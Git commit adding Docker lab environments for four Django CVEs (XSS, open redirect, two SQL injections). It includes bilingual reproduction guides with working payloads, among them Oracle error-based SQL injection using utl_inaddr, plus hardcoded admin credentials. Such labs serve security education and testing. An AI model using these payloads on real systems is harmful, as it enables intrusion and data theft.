first commit

django/CVE-2017-12794/README.md

@@ -0,0 +1,41 @@
+# Django 500 Debug Page Cross-Site Scripting (XSS) (CVE-2017-12794)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django versions before 1.11.5 and 1.10.8 contain a cross-site scripting (XSS) vulnerability in the debug error page. When DEBUG mode is enabled, error pages could potentially expose sensitive information through unescaped HTML in the error message.
+
+The vulnerability is triggered when a database error occurs and its details are displayed in the debug page. The error message from the database is not properly escaped before being rendered in the template.
+
+References:
+
+- <https://www.djangoproject.com/weblog/2017/sep/05/security-releases/>
+- <https://nvd.nist.gov/vuln/detail/CVE-2017-12794>
+- <https://www.leavesongs.com/PENETRATION/django-debug-page-xss.html>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Django server (the version of Django is 1.11.4):
+
+```
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+Visit the following URL to create a user with a malicious username containing JavaScript code:
+
+```
+http://your-ip:8000/create_user/?username=<script>alert(1)</script>
+```
+
+The first request will succeed. Then, visit the same URL again to trigger a database unique constraint error. The error page will include the unescaped username in the error message:
+
+![](1.png)
+
+The JavaScript code in the username will be executed in the browser, demonstrating the XSS vulnerability. This vulnerability could be exploited by attackers to execute arbitrary JavaScript code in the context of the debug page, potentially leading to session hijacking or other client-side attacks.
+
+For detailed principle of this vulnerability, please refer to the third link in the references section: <https://www.leavesongs.com/PENETRATION/django-debug-page-xss.html>

django/CVE-2017-12794/README.zh-cn.md

@@ -0,0 +1,39 @@
+# Django调试页面跨站脚本漏洞（CVE-2017-12794）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django 1.11.5和1.10.8版本之前的调试错误页面中存在跨站脚本（XSS）漏洞。当启用DEBUG模式时，错误页面可能会通过未经转义的HTML错误消息暴露敏感信息。
+
+该漏洞在数据库错误发生并且其详细信息显示在调试页面时触发。数据库的错误消息在模板渲染之前没有被正确转义。
+
+参考链接：
+
+- <https://www.djangoproject.com/weblog/2017/sep/05/security-releases/>
+- <https://nvd.nist.gov/vuln/detail/CVE-2017-12794>
+- <https://www.leavesongs.com/PENETRATION/django-debug-page-xss.html>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Django服务器（Django版本为1.11.4）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+访问以下URL创建一个包含JavaScript代码的恶意用户名：
+
+```
+http://your-ip:8000/create_user/?username=<script>alert(1)</script>
+```
+
+第一次请求将成功创建用户。然后，再次访问相同的URL以触发数据库唯一约束错误。错误页面将在错误消息中包含未经转义的用户名：
+
+![](1.png)
+
+用户名中的JavaScript代码将在浏览器中执行，证实了XSS漏洞的存在。攻击者可以利用此漏洞在调试页面的上下文中执行任意JavaScript代码，可能导致会话劫持或其他客户端攻击。
+
+有关此漏洞的详细原理，请参考这篇博客：<https://www.leavesongs.com/PENETRATION/django-debug-page-xss.html>

django/CVE-2017-12794/app.py

@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+import os
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", __name__)
+import sys
+import dj_database_url
+from django.conf.urls import url
+
+BASE_DIR = os.path.dirname(os.path.abspath(__file__))
+DEBUG = True
+SECRET_KEY = '__secret_key__'
+ALLOWED_HOSTS = ['*']
+
+ROOT_URLCONF = __name__
+TEMPLATES = [{
+    'BACKEND': 'django.template.backends.django.DjangoTemplates',
+    'DIRS': [os.path.join(BASE_DIR, 'templates')],
+}]
+DATABASES = {
+    'default': dj_database_url.config(default='sqlite:///%s' % os.path.join(BASE_DIR, 'db.sqlite3'))
+}
+INSTALLED_APPS = [
+   'xss'
+]
+
+
+def user(request):
+    from django.http import HttpResponse
+    from xss.models import User
+    User.objects.create(username=request.GET['username'])
+    return HttpResponse('Hello, user has been created!')
+
+
+urlpatterns = [
+    url(r'^create_user/$', user)
+]
+
+
+from django.core.management import execute_from_command_line
+execute_from_command_line(sys.argv)

django/CVE-2017-12794/docker-compose.yml

@@ -0,0 +1,16 @@
+version: '2'
+services:
+ web:
+   image: vulhub/django:1.11.4
+   volumes:
+    - .:/app
+   ports:
+    - "8000:8000"
+   depends_on:
+    - db 
+   environment:
+    - DATABASE_URL=postgres://postgres:postgres@db:5432/postgres
+ db:
+   image: postgres:9.6-alpine
+   environment:
+    - POSTGRES_PASSWORD=postgres

django/CVE-2017-12794/xss/apps.py

@@ -0,0 +1,5 @@
+from django.apps import AppConfig
+
+
+class XssConfig(AppConfig):
+    name = 'xss'

django/CVE-2017-12794/xss/migrations/0001_initial.py

@@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+# Generated by Django 1.11.4 on 2017-09-08 05:07
+from __future__ import unicode_literals
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    initial = True
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='User',
+            fields=[
+                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+                ('username', models.CharField(max_length=32, unique=True, verbose_name='Username')),
+            ],
+        ),
+    ]

django/CVE-2017-12794/xss/models.py

@@ -0,0 +1,5 @@
+from django.db import models
+
+
+class User(models.Model):
+    username = models.CharField('Username', unique=True, max_length=32)

django/CVE-2018-14574/Dockerfile

@@ -0,0 +1,10 @@
+FROM python:3.7-alpine
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN pip install -U pip \
+    && pip install django==2.0.7
+
+WORKDIR /usr/src
+
+CMD ["python", "app.py", "runserver", "0.0.0.0:8000"]

django/CVE-2018-14574/README.md

@@ -0,0 +1,37 @@
+# Django < 2.0.8 Open Redirect in CommonMiddleware (CVE-2018-14574)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django versions before 2.0.8 and 1.11.15 contain an open redirect vulnerability in CommonMiddleware when both `django.middleware.common.CommonMiddleware` and the `APPEND_SLASH` setting are enabled. If the project has a URL pattern that accepts any path ending in a slash, a maliciously crafted URL could lead to a redirect to an arbitrary external site, enabling phishing and other attacks.
+
+References:
+
+- <https://www.djangoproject.com/weblog/2018/aug/01/security-releases/>
+- <https://nvd.nist.gov/vuln/detail/CVE-2018-14574>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Django 2.0.7 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+Visit the following URL to trigger the open redirect vulnerability:
+
+```
+http://your-ip:8000//www.example.com
+```
+
+The server will redirect you to `//www.example.com/`, which the browser interprets as an absolute URL, effectively redirecting to an external site:
+
+![](1.png)
+
+This vulnerability can be exploited by attackers to redirect users to malicious websites, potentially leading to phishing attacks or other security issues.

django/CVE-2018-14574/README.zh-cn.md

@@ -0,0 +1,35 @@
+# Django < 2.0.8 CommonMiddleware任意URL跳转漏洞（CVE-2018-14574）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django 2.0.8和1.11.15版本之前存在一个任意URL跳转漏洞，当同时启用`django.middleware.common.CommonMiddleware`中间件和`APPEND_SLASH`设置时，如果项目中存在接受以斜杠结尾的任意路径的URL模式，攻击者可以构造恶意URL导致重定向到任意外部网站，从而可能导致钓鱼等攻击。
+
+参考链接：
+
+- https://www.djangoproject.com/weblog/2018/jul/18/security-releases/
+- https://nvd.nist.gov/vuln/detail/CVE-2018-14574
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Django 2.0.7服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+访问以下URL触发任意URL跳转漏洞：
+
+```
+http://your-ip:8000//www.example.com
+```
+
+服务器将重定向到`//www.example.com/`，浏览器会将其解释为绝对URL，从而实现对外部站点的重定向：
+
+![](1.png)
+
+攻击者可以利用此漏洞将用户重定向到恶意网站，可能导致钓鱼攻击或其他安全问题。

django/CVE-2018-14574/app.py

@@ -0,0 +1,48 @@
+import os
+import sys
+from django.urls import include, path, re_path
+from django.http import HttpResponse
+
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", __name__)
+BASE_DIR = os.path.dirname(os.path.abspath(__file__))
+DEBUG = False
+SECRET_KEY = 'vulhub'
+
+ALLOWED_HOSTS = ['*']
+MIDDLEWARE = [
+    'django.middleware.common.CommonMiddleware',
+]
+
+ROOT_URLCONF = __name__
+TEMPLATES = [{
+    'BACKEND': 'django.template.backends.django.DjangoTemplates',
+    'DIRS': [os.path.join(BASE_DIR, 'templates')]
+}]
+LOGGING = {
+    'version': 1,
+    'disable_existing_loggers': False,
+    'handlers': {
+        'console': {
+            'class': 'logging.StreamHandler',
+        },
+    },
+    'loggers': {
+        'django': {
+            'handlers': ['console'],
+            'level': os.getenv('DJANGO_LOG_LEVEL', 'WARNING'),
+        },
+    },
+}
+
+
+def home(request, path=None):
+    return HttpResponse('Hello, world.')
+
+
+urlpatterns = [
+    path('', home),
+    re_path(r'^(.*)/$', home),
+]
+
+from django.core.management import execute_from_command_line
+execute_from_command_line(sys.argv)

django/CVE-2018-14574/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ web:
+   build: .
+   ports:
+    - "8000:8000"
+   volumes:
+    - ./app.py:/usr/src/app.py

django/CVE-2019-14234/Dockerfile

@@ -0,0 +1,11 @@
+FROM vulhub/django:2.2.3
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY src/ /usr/src/
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+
+WORKDIR /usr/src
+ENTRYPOINT [ "/docker-entrypoint.sh"]
+CMD [ "python", "manage.py", "runserver", "0.0.0.0:8000" ]

django/CVE-2019-14234/README.md

@@ -0,0 +1,46 @@
+# Django JSONField/HStoreField SQL Injection (CVE-2019-14234)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django released a security update on August 1, 2019, which fixes a SQL injection vulnerability in the JSONField and HStoreField model fields. This vulnerability affects Django versions before 2.2.4, 2.1.11, and 1.11.23.
+
+The vulnerability requires the developer to use JSONField/HStoreField, and the field name of the queryset can be controlled by the user. Django's built-in admin interface is affected by this vulnerability, providing an easy way to demonstrate the issue.
+
+References:
+
+- <https://www.djangoproject.com/weblog/2019/aug/01/security-releases/>
+- <https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html>
+
+## Environment Setup
+
+Execute the following command to compile and start a vulnerable Django 2.2.3 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+First, log in to the Django admin interface at `http://your-ip:8000/admin/` using the following credentials:
+
+- Username: `admin`
+- Password: `a123123123`
+
+Navigate to the Collection model's list view at `http://your-ip:8000/admin/vuln/collection/`:
+
+![](1.png)
+
+To exploit the SQL injection vulnerability, add `detail__a'b=123` to the GET parameters, where `detail` is the JSONField:
+
+```
+http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123
+```
+
+The SQL error message will be displayed, confirming the successful injection:
+
+![](2.png)

django/CVE-2019-14234/README.zh-cn.md

@@ -0,0 +1,44 @@
+# Django JSONField/HStoreField SQL注入漏洞（CVE-2019-14234）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django在2019年8月1日发布了安全更新，修复了在JSONField和HStoreField两个模型字段中存在的SQL注入漏洞。该漏洞影响Django 2.2.4、2.1.11和1.11.23之前的版本。
+
+该漏洞需要开发者使用了JSONField/HStoreField，且用户可以控制查询集中的键名。Django的内置管理界面受此漏洞影响，这为我们提供了一个简单的漏洞演示方法。
+
+参考链接：
+
+- <https://www.djangoproject.com/weblog/2019/aug/01/security-releases/>
+- <https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html>
+
+## 环境搭建
+
+执行如下命令编译并启动一个存在漏洞的Django 2.2.3服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+首先使用以下凭据登录Django管理界面`http://your-ip:8000/admin/`：
+
+- 用户名：`admin`
+- 密码：`a123123123`
+
+导航到Collection模型的列表视图`http://your-ip:8000/admin/vuln/collection/`：
+
+![](1.png)
+
+要利用SQL注入漏洞，在GET参数中添加`detail__a'b=123`，其中`detail`是JSONField字段：
+
+```
+http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123
+```
+
+SQL错误信息将会显示，证实注入成功：
+
+![](2.png)

django/CVE-2019-14234/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    build: .
+    ports:
+    - "8000:8000"
+    depends_on:
+    - db
+  db:
+   image: postgres:9.6-alpine
+   environment:
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=cve

django/CVE-2019-14234/docker-entrypoint.sh

@@ -0,0 +1,12 @@
+#!/bin/bash
+
+set -ex
+cd /usr/src
+
+wait-for-it.sh -t 0 db:5432 -- echo "postgres is up"
+
+python manage.py migrate
+python manage.py loaddata collection.json
+python manage.py shell -c "from django.contrib.auth.models import User; User.objects.create_superuser('admin', 'admin@vulhub.org', 'a123123123') if not User.objects.filter(username='admin').exists() else 0"
+
+exec "$@"

django/CVE-2019-14234/src/collection.json

@@ -0,0 +1,28 @@
+[
+    {
+      "model": "vuln.Collection",
+      "pk": 1,
+      "fields": {
+        "name": "Example 1",
+        "detail": {
+            "title": "title 1",
+            "author": "vulhub",
+            "tags": ["python", "django"],
+            "content": "..."
+        }
+      }
+    },
+    {
+      "model": "vuln.Collection",
+      "pk": 2,
+      "fields": {
+        "name": "Example 2",
+        "detail": {
+            "title": "title 2",
+            "author": "vulhub",
+            "tags": ["python"],
+            "content": "..."
+        }
+      }
+    }
+  ]

django/CVE-2019-14234/src/cve201914234/settings.py

@@ -0,0 +1,125 @@
+"""
+Django settings for cve201914234 project.
+
+Generated by 'django-admin startproject' using Django 2.2.3.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.2/topics/settings/
+
+For the full list of settings and their values, see
+https://docs.djangoproject.com/en/2.2/ref/settings/
+"""
+
+import os
+
+# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
+BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+
+
+# Quick-start development settings - unsuitable for production
+# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
+
+# SECURITY WARNING: keep the secret key used in production secret!
+SECRET_KEY = 'rg3d%3$4%%syk866u%sho7-u+m46m4(_uhwy=t-ms4r9wssus_'
+
+# SECURITY WARNING: don't run with debug turned on in production!
+DEBUG = True
+
+ALLOWED_HOSTS = ["*"]
+
+
+# Application definition
+
+INSTALLED_APPS = [
+    'django.contrib.admin',
+    'django.contrib.auth',
+    'django.contrib.contenttypes',
+    'django.contrib.sessions',
+    'django.contrib.messages',
+    'django.contrib.staticfiles',
+    'vuln',
+]
+
+MIDDLEWARE = [
+    'django.middleware.security.SecurityMiddleware',
+    'django.contrib.sessions.middleware.SessionMiddleware',
+    'django.middleware.common.CommonMiddleware',
+    'django.middleware.csrf.CsrfViewMiddleware',
+    'django.contrib.auth.middleware.AuthenticationMiddleware',
+    'django.contrib.messages.middleware.MessageMiddleware',
+    'django.middleware.clickjacking.XFrameOptionsMiddleware',
+]
+
+ROOT_URLCONF = 'cve201914234.urls'
+
+TEMPLATES = [
+    {
+        'BACKEND': 'django.template.backends.django.DjangoTemplates',
+        'DIRS': [],
+        'APP_DIRS': True,
+        'OPTIONS': {
+            'context_processors': [
+                'django.template.context_processors.debug',
+                'django.template.context_processors.request',
+                'django.contrib.auth.context_processors.auth',
+                'django.contrib.messages.context_processors.messages',
+            ],
+        },
+    },
+]
+
+WSGI_APPLICATION = 'cve201914234.wsgi.application'
+
+
+# Database
+# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
+
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.postgresql',
+        'NAME': 'cve',
+        'USER': 'postgres',
+        'PASSWORD': 'postgres',
+        'HOST': 'db',
+        'PORT': '5432',
+    }
+}
+
+
+# Password validation
+# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
+
+AUTH_PASSWORD_VALIDATORS = [
+    {
+        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
+    },
+]
+
+
+# Internationalization
+# https://docs.djangoproject.com/en/2.2/topics/i18n/
+
+LANGUAGE_CODE = 'en-us'
+
+TIME_ZONE = 'UTC'
+
+USE_I18N = True
+
+USE_L10N = True
+
+USE_TZ = True
+
+
+# Static files (CSS, JavaScript, Images)
+# https://docs.djangoproject.com/en/2.2/howto/static-files/
+
+STATIC_URL = '/static/'

django/CVE-2019-14234/src/cve201914234/urls.py

@@ -0,0 +1,21 @@
+"""cve201914234 URL Configuration
+
+The `urlpatterns` list routes URLs to views. For more information please see:
+    https://docs.djangoproject.com/en/2.2/topics/http/urls/
+Examples:
+Function views
+    1. Add an import:  from my_app import views
+    2. Add a URL to urlpatterns:  path('', views.home, name='home')
+Class-based views
+    1. Add an import:  from other_app.views import Home
+    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')
+Including another URLconf
+    1. Import the include() function: from django.urls import include, path
+    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
+"""
+from django.contrib import admin
+from django.urls import path
+
+urlpatterns = [
+    path('admin/', admin.site.urls),
+]

django/CVE-2019-14234/src/cve201914234/wsgi.py

@@ -0,0 +1,16 @@
+"""
+WSGI config for cve201914234 project.
+
+It exposes the WSGI callable as a module-level variable named ``application``.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
+"""
+
+import os
+
+from django.core.wsgi import get_wsgi_application
+
+os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cve201914234.settings')
+
+application = get_wsgi_application()

django/CVE-2019-14234/src/manage.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+"""Django's command-line utility for administrative tasks."""
+import os
+import sys
+
+
+def main():
+    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cve201914234.settings')
+    try:
+        from django.core.management import execute_from_command_line
+    except ImportError as exc:
+        raise ImportError(
+            "Couldn't import Django. Are you sure it's installed and "
+            "available on your PYTHONPATH environment variable? Did you "
+            "forget to activate a virtual environment?"
+        ) from exc
+    execute_from_command_line(sys.argv)
+
+
+if __name__ == '__main__':
+    main()

django/CVE-2019-14234/src/vuln/admin.py

@@ -0,0 +1,5 @@
+from django.contrib import admin
+from .models import Collection
+
+# Register your models here.
+admin.site.register(Collection)

django/CVE-2019-14234/src/vuln/apps.py

@@ -0,0 +1,5 @@
+from django.apps import AppConfig
+
+
+class VulnConfig(AppConfig):
+    name = 'vuln'

django/CVE-2019-14234/src/vuln/migrations/0001_initial.py

@@ -0,0 +1,23 @@
+# Generated by Django 2.2.3 on 2019-08-02 19:41
+
+from django.db import migrations, models
+from django.contrib.postgres.fields import JSONField
+
+
+class Migration(migrations.Migration):
+
+    initial = True
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='Collection',
+            fields=[
+                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+                ('name', models.CharField(max_length=128)),
+                ('detail', JSONField()),
+            ],
+        ),
+    ]

django/CVE-2019-14234/src/vuln/models.py

@@ -0,0 +1,10 @@
+from django.db import models
+from django.contrib.postgres.fields import JSONField
+
+
+class Collection(models.Model):
+    name = models.CharField(max_length=128)
+    detail = JSONField()
+
+    def __str__(self):
+        return self.name

django/CVE-2020-9402/.gitignore

@@ -0,0 +1,4 @@
+.idea/
+.DS_Store
+venv/
+__pycache__/

django/CVE-2020-9402/Dockerfile

@@ -0,0 +1,10 @@
+FROM vulhub/django:3.0.3
+
+COPY src/ /usr/src/
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+
+WORKDIR /usr/src
+ENTRYPOINT [ "/docker-entrypoint.sh"]
+
+CMD [ "python", "manage.py", "runserver", "0.0.0.0:8000" ]

django/CVE-2020-9402/README.md

@@ -0,0 +1,46 @@
+# Django GIS functions and aggregates on Oracle SQL Injection (CVE-2020-9402)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django released a security update on March 4, 2020, which fixes a SQL injection vulnerability in the GIS functions and aggregates on Oracle. This vulnerability affects Django versions before 3.0.4, 2.2.11, and 1.11.29.
+
+The vulnerability requires the developer to use GIS functions and aggregates, and the field name of the queryset can be controlled by the user. This vulnerability can be exploited through Django's built-in admin interface.
+
+References:
+
+- https://www.djangoproject.com/weblog/2020/mar/04/security-releases/
+
+## Environment Setup
+
+Execute the following command to compile and start a vulnerable Django 3.0.3 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip:8000/vuln/`. You can inject SQL by adding malicious input to the `q` parameter:
+
+```
+http://your-ip:8000/vuln/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1
+```
+
+The SQL error message will be displayed, confirming the successful injection:
+
+![](1.png)
+
+Alternatively, you can visit `http://your-ip:8000/vuln2/` and inject SQL using a different payload:
+
+```
+http://your-ip:8000/vuln2/?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --
+```
+
+The SQL error message will again confirm the successful injection:
+
+![](2.png)

django/CVE-2020-9402/README.zh-cn.md

@@ -0,0 +1,44 @@
+# Django GIS函数和聚合中因容差参数导致SQL注入漏洞（CVE-2020-9402）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django在2020年3月4日发布了安全更新，修复了在GIS查询功能中存在的Oracle SQL注入漏洞。该漏洞影响Django 3.0.4、2.2.11和1.11.29之前的版本。
+
+该漏洞需要开发者使用了GIS中的查询功能，且用户可以控制查询集中的字段名。这个漏洞可以通过Django的内置管理界面进行利用。
+
+参考链接：
+
+- https://www.djangoproject.com/weblog/2020/mar/04/security-releases/
+
+## 环境搭建
+
+执行如下命令编译并启动一个存在漏洞的Django 3.0.3服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+首先访问`http://your-ip:8000/vuln/`。通过向`q`参数添加恶意输入来注入SQL：
+
+```
+http://your-ip:8000/vuln/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1
+```
+
+SQL错误信息将会显示，证实注入成功：
+
+![](1.png)
+
+另外，你也可以访问`http://your-ip:8000/vuln2/`，使用不同的payload进行SQL注入：
+
+```
+http://your-ip:8000/vuln2/?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --
+```
+
+SQL错误信息将再次确认注入成功：
+
+![](2.png)

django/CVE-2020-9402/docker-compose.yml

@@ -0,0 +1,12 @@
+version: '2'
+services:
+  web:
+    build: .
+    ports:
+    - "8000:8000"
+    depends_on:
+    - db
+    restart: always
+  db:
+   image: vulhub/oracle:12c-ee
+   restart: always

django/CVE-2020-9402/docker-entrypoint.sh

@@ -0,0 +1,16 @@
+#!/bin/bash
+
+set -ex
+cd /usr/src
+
+wait-for-it.sh -t 0 db:1521 -- echo "oracle is up"
+
+python manage.py makemigrations
+python manage.py migrate
+python manage.py loaddata collection.json
+python manage.py shell -c "from django.contrib.auth.models import User; User.objects.create_superuser('admin', 'admin@vulhub.org', 'admin') if not User.objects.filter(username='admin').exists() else 0"
+
+exec "$@"
+
+
+

django/CVE-2020-9402/src/CVE20209402/settings.py

@@ -0,0 +1,126 @@
+"""
+Django settings for CVE20209402 project.
+
+Generated by 'django-admin startproject' using Django 2.2.6.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.2/topics/settings/
+
+For the full list of settings and their values, see
+https://docs.djangoproject.com/en/2.2/ref/settings/
+"""
+
+import os
+
+# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
+BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+
+
+# Quick-start development settings - unsuitable for production
+# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
+
+# SECURITY WARNING: keep the secret key used in production secret!
+SECRET_KEY = '+gwh3e_&fa_9m_1ttbvb#mzt3d$*o#hwg+vqdbaw@v)k7yn6(m'
+
+# SECURITY WARNING: don't run with debug turned on in production!
+DEBUG = True
+
+ALLOWED_HOSTS = ["*"]
+
+
+# Application definition
+
+INSTALLED_APPS = [
+    'django.contrib.admin',
+    'django.contrib.auth',
+    'django.contrib.contenttypes',
+    'django.contrib.sessions',
+    'django.contrib.messages',
+    'django.contrib.staticfiles',
+    'django.contrib.gis',
+    'vuln',
+]
+
+MIDDLEWARE = [
+    'django.middleware.security.SecurityMiddleware',
+    'django.contrib.sessions.middleware.SessionMiddleware',
+    'django.middleware.common.CommonMiddleware',
+    'django.middleware.csrf.CsrfViewMiddleware',
+    'django.contrib.auth.middleware.AuthenticationMiddleware',
+    'django.contrib.messages.middleware.MessageMiddleware',
+    'django.middleware.clickjacking.XFrameOptionsMiddleware',
+]
+
+ROOT_URLCONF = 'CVE20209402.urls'
+
+TEMPLATES = [
+    {
+        'BACKEND': 'django.template.backends.django.DjangoTemplates',
+        'DIRS': [],
+        'APP_DIRS': True,
+        'OPTIONS': {
+            'context_processors': [
+                'django.template.context_processors.debug',
+                'django.template.context_processors.request',
+                'django.contrib.auth.context_processors.auth',
+                'django.contrib.messages.context_processors.messages',
+            ],
+        },
+    },
+]
+
+WSGI_APPLICATION = 'CVE20209402.wsgi.application'
+
+
+# Database
+# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
+
+DATABASES = {
+    'default': {
+         'ENGINE': 'django.contrib.gis.db.backends.oracle',
+         'NAME': 'orcl',
+         'USER': 'system',
+         'PASSWORD': 'oracle',
+         'HOST': "db",
+         'PORT': '1521',
+    }
+}
+
+
+# Password validation
+# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
+
+AUTH_PASSWORD_VALIDATORS = [
+    {
+        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
+    },
+    {
+        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
+    },
+]
+
+
+# Internationalization
+# https://docs.djangoproject.com/en/2.2/topics/i18n/
+
+LANGUAGE_CODE = 'en-us'
+
+TIME_ZONE = 'UTC'
+
+USE_I18N = True
+
+USE_L10N = True
+
+USE_TZ = True
+
+
+# Static files (CSS, JavaScript, Images)
+# https://docs.djangoproject.com/en/2.2/howto/static-files/
+
+STATIC_URL = '/static/'

django/CVE-2020-9402/src/CVE20209402/urls.py

@@ -0,0 +1,24 @@
+"""CVE20209402 URL Configuration
+
+The `urlpatterns` list routes URLs to views. For more information please see:
+    https://docs.djangoproject.com/en/2.2/topics/http/urls/
+Examples:
+Function views
+    1. Add an import:  from my_app import views
+    2. Add a URL to urlpatterns:  path('', views.home, name='home')
+Class-based views
+    1. Add an import:  from other_app.views import Home
+    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')
+Including another URLconf
+    1. Import the include() function: from django.urls import include, path
+    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
+"""
+from django.contrib import admin
+from django.urls import path
+from vuln import views
+
+urlpatterns = [
+    path('admin/', admin.site.urls),
+    path('vuln/', views.vuln),
+    path('vuln2/', views.vuln2),
+]

django/CVE-2020-9402/src/CVE20209402/wsgi.py

@@ -0,0 +1,16 @@
+"""
+WSGI config for CVE20209402 project.
+
+It exposes the WSGI callable as a module-level variable named ``application``.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
+"""
+
+import os
+
+from django.core.wsgi import get_wsgi_application
+
+os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CVE20209402.settings')
+
+application = get_wsgi_application()

django/CVE-2020-9402/src/collection.json

@@ -0,0 +1,46 @@
+[
+  {
+    "model": "vuln.names",
+    "pk": 1,
+    "fields": {"name": "Example 1"}
+  },
+  {
+    "model": "vuln.names",
+    "pk": 21,
+    "fields": {"name": "Example 2"}
+  },
+  {
+    "model": "vuln.names",
+    "pk": 41,
+    "fields": {"name": "Example 3"}
+  },
+  {
+    "model": "vuln.names",
+    "pk": 61,
+    "fields": {"name": "Example 4"}
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 1,
+    "fields": {
+      "path": "SRID=4326;LINESTRING (-0.0348982214927673 0.00552803277111328, 0.0315910577774048 0.00638097523323931)"}
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 21,
+    "fields": {
